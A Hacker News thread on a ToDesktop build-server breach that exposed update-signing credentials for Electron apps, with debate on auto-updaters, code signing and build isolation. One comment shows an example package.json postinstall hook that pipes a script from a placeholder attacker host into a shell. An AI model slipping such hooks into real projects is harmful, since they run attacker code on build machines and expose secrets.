felixrieseberg · 6 months ago
As an Electron maintainer, I'll reiterate a warning I've given many people before: your auto-updater and the underlying code-signing and notarization mechanisms are sacred. The recovery mechanisms for the entire system are extremely painful and often require embarrassing emails to customers. A compromised code-signing certificate is close to the top of my personal nightmares.

Dave and toDesktop have built a product that serves many people really well, but I'd encourage everyone building desktop software (no matter how, with or without toDesktop!) to really understand everything involved in compiling, signing, and releasing your builds. In my projects, I often argue against too much abstraction and long dependency chains in those processes.

If you're an Electron developer (like the apps mentioned), I recommend:

* Build with Electron Forge, which is maintained by Electron and uses @electron/windows-sign and @electron/osx-sign directly. No magic.

* For Windows signing, use Azure Trusted Signing, which signs just-in-time. That's relatively new and offers some additional recovery mechanisms in the worst case.

* You probably want to rotate your certificates if you ever gave anyone else access.

* Lastly, you should probably be the only one with the keys to your update server.

RadiozRadioz · 6 months ago
How about we don't build an auto-updater? Maybe some apps require an extremely tight coupling with a server, but we should try our best to release complete software to users that will work as close to forever as possible. Touching files on a user's system should be treated as a rare special occurrence. If a server is involved with the app, build a stable interface and think long and hard about every change. Meticulously version and maintain everything. If a server is involved, it is completely unacceptable for a server-side change to break an existing user's local application unless it is impossible to avoid - it should be seen as an absolute last resort with an apology to affected customers (agree with OP on this one).

It is your duty to make sure _all_ of your users are able to continue using the same software they installed in exactly the same way for the reasonable lifetime of their contract, the package, or underlying system (and that lifetime is measured in years/decades, with the goal of forever where possible. Not months).

You can, if you must, include an update notification, but this absolutely cannot disrupt the user's experience; no popups, do not require action, include an "ignore forever" button. If you have a good product with genuinely good feature improvements, users will voluntarily upgrade to a new package. If they don't, that is why you have a sales team.

Additionally, more broadly, it is not your app's job to handle updates. That is the job of your operating system and its package manager. But I understand that Windows is behind in this regard, so it is acceptable to compromise there.

We go a step further at my company. Any customer is able to request any previous version of their package at any time, and we provide them an Internet download page or overnight ship them a CD free of charge (and now USB too).

Hackbraten · 6 months ago
> Maybe some apps require an extremely tight coupling with a server, but we should try our best to release complete software to users that will work as close to forever as possible.

That sounds like a good idea. Unless you’re the vendor, and instead of 1000 support requests for version N, you’re now facing 100 support requests for version N, 100 for N−1, 100 for N−2, …, and 100 for N−9.

PeterStuer · 6 months ago
Sounds like you come from the B2B, consultancyware, or 6+ figure/year license world.

For the vast realm of sub-$300/year products, the ones that actually use updaters, all your suggestions are completely unviable.

klabb3 · 6 months ago
> How about we don't build an auto-updater?

Sure. I’d rather have it be provided by the platform. It’s a lot of work to maintain for 5 OSs (3 desktop, 2 mobile).

> we should try our best to release complete software to users that will work as close to forever as possible

This isn’t feasible. Last time I tried to support old systems in my app, the vendor (Apple) had stopped supporting them and didn’t even provide free VMs. Windows 10 is scheduled to go out of support this year (afaik). On Linux, glibc or gtk will mess with any GUI app after a few years. If Microsoft, Google, and Apple can’t, why the hell should I as a solo app developer? Plus, I have 5 platforms to worry about; they only have their own.

> Touching files on a user's system should be treated as a rare special occurrence.

Huh? That’s why I built an app and not a website in the first place. My app is networked both p2p and to api and does file transfers. And I’m supposed to not touch files?

> If a server is involved with the app, build a stable interface and think long and hard about every change.

Believe me, I do. These changes are as scary as database migrations. But like those, you can't avoid them forever. And for those cases, you need at the very least to let the user know what’s happening. That’s half of the update infrastructure.

Big picture, I can agree with the sentiment that ship fast culture has gone too far with apps and also we rely on cloud way too much. That’s what the local first movement is about.

At the same time, I disagree with the generalization seemingly based on a narrow stereotype of an app. For most non-tech users, non-disruptive background updates are ideal. This is what iOS does overnight when charging and on WiFi.

I have nothing against disabling auto updates for those who like to update their own software, but as a default it would lead to massive amounts of stale non-working software.

theragra · 6 months ago
For me, Windows is a thousand years ahead in this regard. I download software and run it, and it works 99.9% of the time. Yes, I have a chance of getting a virus. That happened once in the 30 years I've been using Windows (more often in DOS times).

Linux, I got burned again yesterday. Proxmox distribution has no package I need in their repository.

I am trying to use Ubuntu package - does not work.

I try to use debian - too old version.

How do I solve this? By learning some details of how Linux distributions and repositories work, struggling some more, and finding a custom-built .deb. Okay, I can do it, kinda, but what about a non-IT person?

Software without dependencies is awesome. So, docker is something I respect a lot, because it allows the same model (kinda).

pjmlp · 6 months ago
Windows Store and winget. Developers are the ones behind the times.
rs186 · 6 months ago
> How about we don't build an auto-updater?

Auto-updaters are the most practical and efficient way of pushing updates in today's world. As pointed out by others, the alternative would be to go through app store's update mechanism, if the app is distributed via app store in the first place, and many people avoid Microsoft store/MacOS app store whenever possible. And no developer likes that process.

pjerem · 6 months ago
I do agree with you but I think that unfortunately you are wrong on the job of updates. You have an idealistic vision that I share but well, it remains idealistic.

Apart from, maybe, Linux distros, neither Apple nor Microsoft provides anything to handle updates that isn’t a proprietary store with shitty rules.

For sure the rules are broken on desktop OSs, but in the meantime you still have to distribute and update your software. Should the update be automatic? No. Should you provide an easy way to update? I’d say that in the end it depends on whether you think it’s important to provide updates to your users. But should you expect your users or their OSs to somehow update your app by themselves? Nope.

itsthecourier · 6 months ago
I have clients who have been running for more than 10 years in old versions for diverse reasons. I design a layer of backward compatibility in our apis to keep updating optional. it works well
rustcleaner · 6 months ago
This one is right.

Have a shoe-box key, a key which is copied 2*N (redundancy) times and N copies are stored in 2 shoe-boxes. It can be on tape, or optical, or silicon, or paper. This key always stays offline. This is your rootiest of root keys in your products, and almost nothing is signed by it. The next key down which the shoe-box key signs (ideally, the only thing) is for all intents and purposes your acting "root certificate authority" key running hot in whatever highly secure signing enclave you design for any other ordinary root CA setup. Then continue from there.

Your hot and running root CA could get totally pwned, and as long as you had come to Jesus with your shoe-box key and religiously never ever interacted with it or put it online in any way, you can sign a new acting root CA key with it and sign a revocation for the old one. Then put the shoe-box away.

account42 · 6 months ago
Signing a revocation doesn't magically inform all affected devices. In practice this is equivalent to pushing an update that replaces the root key.
Sytten · 6 months ago
I mean, sure, but is that possible for OS builds? Generally you generate a private key, get a cert for it, give it to Apple so they sign it with their key, and then you use the private key to sign your build. I have never seen a guide describe a two-level process and I am not convinced it is allowed.
oncallthrow · 6 months ago
> It can be on tape, or optical, or silicon, or paper.

You can pick up a hardware security module for a few thousand bucks. No excuse not to.

TZubiri · 6 months ago
Question.

I've noticed a lot of websites import from other sites, instead of local.

<script src="scriptscdn.com/libv1.3">

I almost never see a hash in there. Is this as dangerous as it looks, why don't people just use a hash?

bastawhiz · 6 months ago
1. Yes

2. Because that requires you to know how to find the hash and add it.

Truthfully the burden should be on the third party that's serving the script (where did you copy that HTML from in the first place?), but they aren't incentivized to have other sites use a hash.

valenterry · 6 months ago
Yes it is. Hashes must absolutely be used in that case.
paradite · 6 months ago
Hi. I'm an electron app developer. I use electron builder paired with AWS S3 for auto update.

I have always put Windows signing on hold due to the cost of commercial certificate.

Is the Azure Trusted Signing significantly cheaper than obtaining a commercial certificate? Can I run it on my CI as part of my build pipeline?

felixrieseberg · 6 months ago
Azure Trusted Signing is one of the best things Microsoft has done for app developers last year, I'm really happy with it. It's $9.99/month and open both to companies and individuals who can verify their identity (it used to only be companies). You really just call signtool.exe with a custom dll.

I wrote @electron/windows-sign specifically to cover it: https://github.com/electron/windows-sign

Reference implementation: https://github.com/felixrieseberg/windows95/blob/master/forg...
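
For the curious, "signtool.exe with a custom dll" boils down to pointing signtool at a digest DLL plus a metadata file. A sketch that just assembles the argument list; the dlib path and metadata file name are assumptions based on Microsoft's docs, so adjust for your setup:

```javascript
// Build the signtool argument list for Azure Trusted Signing.
// (/dlib names the Trusted Signing plugin DLL; /dmdf names a JSON file
// identifying your account and certificate profile.)
function trustedSigningArgs(file) {
  return [
    'sign',
    '/v',                                        // verbose output
    '/fd', 'SHA256',                             // file digest algorithm
    '/tr', 'http://timestamp.acs.microsoft.com', // timestamp server
    '/td', 'SHA256',                             // timestamp digest
    '/dlib', 'Azure.CodeSigning.Dlib.dll',       // assumption: plugin path
    '/dmdf', 'metadata.json',                    // assumption: metadata file
    file,
  ];
}

console.log(['signtool.exe', ...trustedSigningArgs('MyApp-Setup.exe')].join(' '));
```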

mckravchyk · 6 months ago
> No magic.

There's plenty of magic. I think that Electron Forge does too many things, like trying to be the bundler. Is it possible to set up a custom build system / bundling with it or are you forced to use Vite? I guess that even if you can, you pull all those dependencies when you install it and naturally you can't opt out from that. Those dev dependencies involved in the build process are higher impact than some production dependencies that run in a sandboxed tab process (because a tiny malicious dependency could insert any code into the app's fully privileged process). I have not shipped my app yet, but I am betting on ESBuild (because it's just one Go binary) and Electron Builder (electron.build)

hinkley · 6 months ago
Code signing is a really excellent place to look at ponying up the money for one of those hardware security modules that triggers sticker shock. The ones on their own PCI card with potted chips and optional Byzantine Generals access cards and consultants wearing ties. It’s cheaper than blowing six months of developer time trying to fake it (remember, it will always take you twice as long as you think it will).

I built one code signing system after being the “rubber duck” for a gentleman who built another, and both used HSM cards and not cheap ones. Not those shitty little USB ones. One protected cellphones, the other protected commercial aviation.

filleokus · 6 months ago
> For Windows signing, use Azure Trusted Signing

I recently checked it out as an alternative to renewing our signing cert, but it doesn't support issuing EV certs.

I've understood it as having an EV code signing cert on Windows is required for drivers, but somehow also gives you better SmartScreen reputation making it useful even for user space apps in enterprisey settings?

Not sure if this is FUD spread by the EV CA's or not though?

gschier · 6 months ago
I'm not sure if mine is technically considered EV, but it's linked to my corporation and I get no virus warnings at all during install.

jbverschoor · 6 months ago
You know, there's this nice little thing called AppStore on the mac, and it can auto update
woadwarrior01 · 6 months ago
All apps on the Mac AppStore have to be sandboxed, which is great for the end-user, but a pain in the neck for the run of the mill electron app dev.
gamedever · 6 months ago
And yet, tons of developers install GitHub apps that ask for full permissions to control all repos and can therefore do the same things to every dev using those services.

github should be ashamed this possibility even exists, and doubly ashamed that their permission system and UX is so poorly conceived that it leads apps to ask for all the permissions.

IMO, github should spend significant effort so that the default is to present the user with a list of repos they want some github integration to have permissions for and then for each repo, the specific permissions needed. They should be designed that minimal permissions is encouraged.

As it is, the path of least resistance for app devs is "give me root" and for users to say "ok, sure"

madeofpalk · 6 months ago
Why spend that effort when any code you run on your machine (such as dependency post-install scripts, or the dependencies themselves!) can just run `gh auth token` and grab a token for all the code you push up?

By design, the gh cli wants write access to everything on github you can access.

charrondev · 6 months ago
I will note that at least for our GitHub enterprise setup permissions are all granular, tokens are managed by the org and require an approval process.

I’m not sure how much of this is “standard” for an org though.

xmprt · 6 months ago
I personally haven't worked with many of the github apps that you seem to refer to but the few that I've used are only limited to access the specific repositories that I give and within those repositories their access control is scoped as well. I figured this is all stuff that can be controlled on Github's side. Am I mistaken?
cdmyrm · 6 months ago
Yeah, turns out "modern" software development has more holes than Swiss cheese. What else is new?
101008 · 6 months ago
Question that I hope you can help me with. I'm working on an Electron app that works offline. I plan to sell it cheap, like a $5 one-time payment.

It won't have licenses or anything, so if somebody wants to distribute it outside my website they will be able to do it.

If I just want to point to an exe file link in S3 without auto updates, should just compiling and uploading be enough?

davej · 6 months ago
Dave here, founder of ToDesktop. I've shared a write-up: https://www.todesktop.com/blog/posts/security-incident-at-to...

This vulnerability was genuinely embarrassing, and I'm sorry we let it happen. After thorough internal and third-party audits, we've fundamentally restructured our security practices to ensure this scenario can't recur. Full details are covered in the linked write-up. Special thanks to Eva for responsibly reporting this.

spudlyo · 6 months ago
> cannot happen again.

Hubris. Does not inspire confidence.

> We resolved the vulnerability within 26 hours of its initial report, and additional security audits were completed by February 2025.

After reading the vulnerability report, I am impressed at how quickly you guys jumped on the fix, so kudos. Did the security audit lead to any significant remediation work? If you weren't following PoLP, I wonder what else may have been overlooked?

davej · 6 months ago
Fair point. Perhaps better phrased as "to ensure this scenario can't recur.". I'll edit my post.

Yes, we re-architected our build container as part of remediation efforts, it was quite significant.

abhiaagarwal · 6 months ago
Based on the claims on the blog, it feels reasonable to say that this "cannot" occur again.

BonusPlay · 6 months ago
Honestly I don't get why people are hating this response so much.

Life is complex and vulnerabilities happen. They quickly contacted the reporter (instead of sending email to spam) and deployed a fix.

> we've fundamentally restructured our security practices to ensure this scenario can't recur

People in this thread seem furious about this one and I don't really know why. Other than needing to unpack some "enterprise" language, I view this as "we fixed some shit and got tests to notify us if it happens again".

To everyone saying "how can you be sure that it will NEVER happen", maybe because they removed all full-privileged admin tokens and are only using scoped tokens? This is a small misdirection, they aren't saying "vulnerabilities won't happen", but "exactly this one" won't.

So Dave, good job to your team for handling the issue decently. Quick patches and public disclosure are also more than welcome. One tip I'd take from this is to use less "enterprise" language in security topics (or people will eat you in the comments).

davej · 6 months ago
Thank you.

Point taken on enterprise language. I think we did a decent job of keeping it readable in our disclosure write-up but you’re 100% right, my comment above could have been written much more plainly.

Our disclosure write-up: https://www.todesktop.com/blog/posts/security-incident-at-to...

AlexCoventry · 6 months ago
> We have reviewed logs and inspected app bundles.

Were the logs independent of firebase? (Could someone exploiting this vulnerability have cleaned up after themselves in the logs?)

hakaneskici · 6 months ago
How can -let's say- Cursor users be sure they were not compromised?

> No malicious usage was detected

Curious to hear about methods used if OK to share, something like STRIDE maybe?

Centigonal · 6 months ago
from todesktop's report:

> Completed a review of the logs. Confirming all identified activity was from the researcher (verified by IP Address and user agent).

beardedwizard · 6 months ago
Annual pen tests are great, but what are you doing to actually improve the engineering design process that failed to identify this gap? How can you possibly claim to be confident this won't happen again unless you myopically focus on this single bug, which itself is a symptom of a larger design problem.

These kinds of "never happen again" statements never age well, and make no sense to even put forward.

A more pragmatic response might look like: something similar can and probably will happen again, just like any other bugs. Here are the engineering standards we use ..., here is how they compare to our peers our size ..., here are our goals with it ..., here is how we know when to improve it...

UltraSane · 6 months ago
Critical private keys must be stored on HSMs or they will be compromised.
ec109685 · 6 months ago
What horrible form not contacting affected customers right away after performing the patch.

Who knows what else was vulnerable in your infrastructure when you leaked .encrypted like that.

It should have been up to your customers to decide if they still wanted to use your services.

edm0nd · 6 months ago
how much of a bounty was paid to Eva for this finding?
richardboegli · 6 months ago
> they were nice enough to compensate me for my efforts and were very nice in general.

They were compensated, but the comment doesn't elaborate on the amount.

eviks · 6 months ago
> for those wondering, in total i got 5k for this vuln

nyolfen · 6 months ago
no offense man but this is totally inexcusable and there is zero chance i am ever touching anything made by y'all, ever
cdmyrm · 6 months ago
Good call. I'd seriously consider firing the developers responsible, too.

TZubiri · 6 months ago
Don't worry man, it's way more embarassing for the people that downloaded your dep or any upstream tool.

If they didn't pay you a cent, you have no liability here.

remram · 6 months ago
This is not how the law works anywhere, thankfully.
sky2224 · 6 months ago
This is the second big attack found by this individual in what... 6 months? The previous exploit (which was in Arc browser), also leveraged a poorly configured firebase db: https://kibty.town/blog/arc/

So this is to say, at what point should we start pointing the finger at Google for allowing developers to shoot themselves in the foot so easily? Granted, I don't have much experience with firebase, but to me this just screams something about the configuration process is being improperly communicated or overall is just too convoluted as a whole.

999900000999 · 6 months ago
Firebase lets anyone get started in 30 seconds.

Details like proper usage and security are often overlooked. Google isn't to blame if you ship a paid product without running a security audit.

I use firebase essentially for hobbyist projects for me and my friends.

If I had to guess, these issues come about because developers are rushing to market. Not Google's fault... What works for a prototype isn't production-ready.

bastawhiz · 6 months ago
> Google isn't to blame if you ship a paid product without running a security audit.

Arguably, if you provide a service that makes it trivial to create security issues (that is to say, you have to go out of your way to use it correctly) then it's your fault. If making it secure means making it somewhat less convenient, it's 100% your fault for not making it less convenient.

nightpool · 6 months ago
I don't think Firebase is really at fault here—the major issue they highlighted is that the deployment pipeline uploaded the compiled artifact to a shared bucket from a container that the user controlled. This doesn't have anything to do with firebase—it would have been just as impactful if the container building the code uploaded it to S3 from the buildbot.
itsnotvalid · 6 months ago
Agreed. I recently stumbled upon the fact that even Hacker News is using Firebase for exposing an API for articles. Caution should be taken when writing server-side software in general.
valenterry · 6 months ago
The problem is that if there is a security incident, basically nobody cares except for some of us here. Normal people just ignore it. Until that changes, nothing you do will change the situation.
cdmyrm · 6 months ago
I'm sorry, but when will we hold the writers of crappy code responsible for their own bad decisions? Let's start there.
notpachet · 6 months ago
I don't know but we're in a thread about Cursor... I don't think anyone is writing significantly better code using Cursor.
brabel · 6 months ago
I always find it unbelievable how we NEVER hold developers accountable. Any "actual" engineer would be (at least the one signing off; but in software, developers never sign off on anything, and maybe that's the problem).
swiftcoder · 6 months ago
> update: cursor (one of the affected customers) is giving me 50k USD for my efforts.

Kudos to cursor for compensating here. They aren't necessarily obliged to do so, but doing so demonstrates some level of commitment to security and community.

mcoliver · 6 months ago
"i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload"

Just want to make sure I understand this. They made a hello world app and submitted it to toDesktop with a postinstall script that opened a reverse shell on the toDesktop build machine? Maybe I missed it, but that shouldn't be possible. Build machines shouldn't have open outbound internet access, right? I didn't see that explained clearly, but maybe I'm missing something or misunderstanding.
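
(For anyone unfamiliar with the mechanism: npm lifecycle scripts are arbitrary shell commands, so a package.json along these lines, with a placeholder attacker host, executes on whatever machine runs `npm install`:)

```json
{
  "name": "innocuous-app",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl -s https://attacker.example/payload.sh | sh"
  }
}
```

Which is why build services have to either disable lifecycle scripts (`npm install --ignore-scripts`) or treat the build container as fully attacker-controlled.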

TheDong · 6 months ago
In what world do you have a machine which downloads source code to build it, but doesn't have outbound internet access so it can't download source code or build dependencies?

Like, effectively the "build machine" here is a locked down docker container that runs "git clone && npm build", right? How do you do either of those activities without outbound network access?

And outbound network access is enough on its own to create a reverse shell, even without any open inbound ports.

The miss here isn't that the build container had network access, it's that the build container both ran untrusted code, and had access to secrets.

arccy · 6 months ago
It's common, doesn't mean it's secure. A lot of linux distros in their packaging will separate download (allows outbound to fetch dependencies), from build (no outside access).

Unfortunately, in some ecosystems, even downloading packages using the native package managers is unsafe because of postinstall scripts or equivalent.

ndriscoll · 6 months ago
Even if your builders are downloading dependencies on the fly, you can and should force that through an artifact repository (e.g. artifactory) you control. They shouldn't need arbitrary outbound Internet access. The builder needs a token injected with read-only pull permissions for a write-through cache and push permissions to the path it is currently building for. The only thing it needs to talk to is the artifactory instance.
gtirloni · 6 months ago
In a world with an internal proxy/mirror for dependencies and no internet access allowed by build systems.
fc417fc802 · 6 months ago
If you don't network isolate your build tooling then how do you have any confidence that your inputs are what you believe them to be? I run my build tools in a network namespace with no connection to the outside world. The dependencies are whatever I explicitly checked into the repo or otherwise placed within the directory tree.
zahlman · 6 months ago
> The miss here isn't that the build container had network access, it's that the build container both ran untrusted code, and had access to secrets.

If you're providing a build container service then you pretty much have to run untrusted code (the customer's) in the container, yes? So then the problem is really just the bad Firebase config... ?

mcoliver · 6 months ago
There are plenty of worlds that take security more seriously and practice defense in depth. Your response could use a little less hubris and a more genuinely inquisitive tone. Looks like others have already chimed in here but to respond to your (what feels like sarcasm) questions:

- You can have a submission process that accepts a package or downloads dependencies, and then passes it to another machine that is on an isolated network for code execution / build which then returns the built package and logs to the network facing machine for consumption.

Now, sure, if your build machine still exposes everything on it to the user-supplied code (instead of sandboxing the actual npm build/make/etc. command), you could insert malicious code that zips up the whole filesystem, env vars, etc., and exfiltrates them through your built app, in this case snagging the secrets.

I don't disagree that the secrets on the build machine were the big miss, but I also think designing the build system differently could have helped.

katbyte · 6 months ago
you use a language where you have all your deps local to the repo? ie go vendor?
areyourllySorry · 6 months ago
you can always limit said network access to npm.
cdmyrm · 6 months ago
It's called air-gapping, and lots of adults do it.
trallnag · 6 months ago
Isn't it really common for build machines to have outbound internet access? Millions of developers use GitHub Actions for building artifacts and the public runners definitely have outbound internet access
tomjakubowski · 6 months ago
Indeed, you can punch out from an actions runner. Such a thing is probably against GitHub's ToS, but I've heard from my third cousin twice removed that his friend once ssh'ed out from an action to a bastion host, then used port forwarding to get herself a shell on the runner in order to debug a failing build.
arccy · 6 months ago
A few decades ago, it was also really common to smoke. Common != good, github actions isn't a true build tool, it's an arbitrary code runtime platform with a few triggers tied to your github.
selfhoster · 6 months ago
It is, and regardless of a few other commenters saying or hinting that it isn't... it is. An air-gapped build machine wouldn't work for most software built today.
leni536 · 6 months ago
Note that without a reverse shell you could still leak the secrets in the built artifact itself.
permo-w · 6 months ago
I'm a huge fan of the writing style. it's like hacking gonzo, but with literally 0 fluff. amazing work and an absolute delight to read from beginning to end

GuestFAUniverse · 6 months ago
" please do not harass these companies or make it seem like it's their fault, it's not. it's todesktop's fault if anything) "

I don't get it. Why would it be "todesktop's fault", when all the mentioned companies allowed to push updates?

I had these kind of discussions with naive developers giving _full access_ to GitHub orgs to various 3rd party apps -- that's never right!

stefan_ · 6 months ago
Yeah, it is their fault. I don't download "todesktop" (to-exploit), I download Cursor. Don't give 3rd parties push access to all your clients, that's crazy. How can this crappy startup build server sign a build for you? That's insane.
floydnoel · 6 months ago
it blows me away that this is even a product. it's like a half day of dev time, and they don’t appear to have over-engineered it or even done basic things given the exploit here.
asciii · 6 months ago
> i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload

From ToDesktop incident report,

> This leak occurred because the build container had broader permissions than necessary, allowing a postinstall script in an application's package.json to retrieve Firebase credentials. We have since changed our architecture so that this can not happen again, see the "Infrastructure and tooling" and "Access control and authentication" sections above for more information about our fixes.

I'm curious to know what the trial and error here was to get their machine to spit out the build, or if it was done in one shot.

hassleblad23 · 6 months ago
I would start by dumping the environment variables and directory structure.